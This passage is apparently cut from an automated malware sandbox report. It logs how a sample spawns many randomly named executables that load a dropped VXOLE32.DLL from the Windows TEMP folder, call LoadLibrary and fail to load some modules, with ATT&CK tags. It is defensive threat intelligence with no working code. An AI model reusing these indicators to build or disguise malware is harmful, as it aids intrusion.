\"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"880026.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"264846.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"264846.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"264846.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"264846.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"264846.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"884020.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"884020.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"884020.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"884020.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"884020.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"026844.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"026844.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"026844.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"026844.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0002440.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"0002440.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0002440.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"0002440.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0002440.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"828406.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"fxlhpd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"646228.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"646228.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"646228.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"646228.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"646228.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"808828.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"808828.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"808828.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"808828.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"808828.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"6020448.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"6020448.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6020448.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"6020448.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6020448.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"2044406.exe\" loaded module \"MSVCRT.DLL\" at base 76bb0000\n \"2044406.exe\" loaded module \"SHLWAPI.DLL\" at base 76520000\n \"2044406.exe\" loaded module \"USER32.DLL\" at base 763d0000\n \"2044406.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"660206.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"660206.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"660206.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"660206.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"660206.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"280844.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"280844.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"280844.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"280844.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"280844.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"nnvhlr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"nnvhlr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nnvhlr.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"nnvhlr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nnvhlr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"xjpjtlp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"xjpjtlp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xjpjtlp.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"xjpjtlp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xjpjtlp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"4804844.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"tvlvjll.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"tvlvjll.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tvlvjll.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"tvlvjll.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tvlvjll.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"frphr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"frphr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"frphr.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"frphr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"frphr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"frphr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"nndjbrh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"nndjbrh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nndjbrh.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"nndjbrh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nndjbrh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"nndjbrh.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"466842.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"466842.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"466842.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"466842.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"466842.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006052)\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006052)\n \"282462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005892)\n \"282462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005892)\n \"282462.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005892)\n \"282462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005892)\n \"02006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005764)\n \"02006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005764)\n \"02006.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005764)\n \"02006.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005764)\n \"682088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005900)\n \"682088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005900)\n \"682088.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005900)\n \"682088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005900)\n \"828684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004100)\n \"828684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004100)\n \"828684.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004100)\n \"828684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004100)\n \"44828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006084)\n \"44828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006084)\n \"44828.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006084)\n \"44828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006084)\n \"hnvfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004152)\n \"hnvfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004152)\n \"hnvfx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004152)\n \"hnvfx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004152)\n \"ndtrth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002812)\n \"ndtrth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002812)\n \"ndtrth.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002812)\n \"ndtrth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002812)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003944)\n \"vtttbl.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003944)\n \"nbhbvdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002272)\n \"nbhbvdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002272)\n \"nbhbvdb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002272)\n \"nbhbvdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002272)\n \"dljfl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004092)\n \"dljfl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004092)\n \"dljfl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004092)\n \"dljfl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004092)\n \"tnhhvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003628)\n \"tnhhvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003628)\n \"tnhhvv.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003628)\n \"tnhhvv.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003628)\n \"64088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001072)\n \"64088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001072)\n \"64088.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001072)\n \"64088.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001072)\n \"6022622.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004004)\n \"6022622.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004004)\n \"6022622.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004004)\n \"6022622.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004004)\n \"fpfntvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004244)\n \"fpfntvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004244)\n \"fpfntvj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004244)\n \"fpfntvj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004244)\n \"hxtbvp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003344)\n \"hxtbvp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003344)\n \"hxtbvp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003344)\n \"hxtbvp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003344)\n \"dbjvvrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003516)\n \"dbjvvrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003516)\n \"dbjvvrj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003516)\n \"dbjvvrj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003516)\n \"880026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002380)\n \"880026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002380)\n \"880026.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002380)\n \"880026.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002380)\n \"264846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003180)\n \"264846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003180)\n \"264846.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003180)\n \"264846.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003180)\n \"884020.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006116)\n \"884020.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006116)\n \"884020.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006116)\n \"884020.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006116)\n \"026844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003988)\n \"026844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003988)\n \"026844.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003988)\n \"026844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003988)\n \"0002440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004404)\n \"0002440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004404)\n \"0002440.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004404)\n \"0002440.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004404)\n \"646228.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004436)\n \"646228.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004436)\n \"646228.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004436)\n \"646228.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004436)\n \"808828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002844)\n \"808828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002844)\n \"808828.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002844)\n \"808828.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002844)\n \"6020448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000712)\n \"6020448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000712)\n \"6020448.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000712)\n \"6020448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000712)\n \"2044406.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00001164)\n \"2044406.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00001164)\n \"2044406.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00001164)\n \"660206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001580)\n \"660206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001580)\n \"660206.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001580)\n \"660206.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001580)\n \"280844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003140)\n \"280844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003140)\n \"280844.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003140)\n \"280844.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003140)\n \"nnvhlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000416)\n \"nnvhlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000416)\n \"nnvhlr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000416)\n \"nnvhlr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000416)\n \"xjpjtlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003884)\n \"xjpjtlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003884)\n \"xjpjtlp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003884)\n \"xjpjtlp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003884)\n \"tvlvjll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000788)\n \"tvlvjll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000788)\n \"tvlvjll.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000788)\n \"tvlvjll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000788)\n \"frphr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003076)\n \"frphr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003076)\n \"frphr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003076)\n \"frphr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003076)\n \"nndjbrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002232)\n \"nndjbrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002232)\n \"nndjbrh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002232)\n \"nndjbrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002232)\n \"466842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003568)\n \"466842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003568)\n \"466842.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003568)\n \"466842.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003568)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"282462.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"282462.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"02006.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"02006.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"682088.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"682088.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"828684.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"828684.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"44828.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"44828.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hnvfx.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hnvfx.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"ndtrth.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"ndtrth.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"vtttbl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"vtttbl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"nbhbvdb.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"nbhbvdb.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dljfl.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dljfl.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"tnhhvv.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"tnhhvv.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"64088.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"64088.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"6022622.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"6022622.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"fpfntvj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fpfntvj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"hxtbvp.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"hxtbvp.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"dbjvvrj.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dbjvvrj.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"880026.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"880026.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"264846.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"264846.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"884020.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"884020.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"026844.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"026844.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"0002440.exe\" failed to load missing module 